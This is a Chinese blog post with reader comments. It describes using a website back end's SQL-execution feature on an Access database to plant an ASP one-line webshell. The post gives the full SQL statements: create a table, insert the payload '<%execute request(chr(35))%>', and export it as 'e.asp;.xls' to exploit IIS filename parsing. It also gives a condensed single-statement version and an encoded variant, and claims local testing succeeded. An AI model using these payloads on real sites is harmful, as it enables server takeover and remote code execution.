在有的网站后台有一个执行sql的功能,然后可以得到了网站的物理路径。哈哈 那么这个就可以利用啦。。。。
需要执行如下操作:
(1)
create table a (b varchar(50)) |
建立一个有一个b字段的表,表名为a,字段类型为字符,长度为50
(2)
insert into a (b) values('<%execute request(chr(35))%>') |
在表a的b字段插入密码为#的一句话木马
(3)
select * into [b] in 'd:\......\e.asp;.xls' 'excel 8.0;' from a |
把表a的内容导出为e.asp;xlsdrop
其实上述3个语句用一句就可以实现:
SELECT '<%execute request(chr(35))%>' into [user] in 'd:\......\e.asp;.xls' 'excel 8.0;' from [user] |
整个过程。。。。
create table a (a varchar(50)) |
insert into a (a) values ('┼攠數畣整爠煥敵瑳∨≡┩愾') |
select * into [b] in 'd:\......\e.asp;.xls' 'excel 4.0;' from a |
我对上面的方法在本地都测试了下,是可以实现的,并且可以用一句话客户端链接并执行(IIS+win2003)。
当然由于服务器权限的限制,实际操作时也有不成功的可能。
@骨头博客营销助手: 哇靠 这么贵。。。 你给免费测试下吧 你看你广告都打在我博客来了 你是不是也得表示下呢
@Neeke: ACC?
为什么
SELECT ‘<%execute request(chr(35))%>’ into [user] in ‘d:\……\e.asp;.xls’ ‘excel 8.0;’ from [user]
这句我这mssql 2005 执行会报错。?
消息 156,级别 15,状态 1,第 1 行
关键字 ‘in’ 附近有语法错误。
@明.: 导出的路径对么?
@Doosit: 看清楚,是mssql 。文中针对的是access数据库。
@yezi:
受教了 要看仔细啊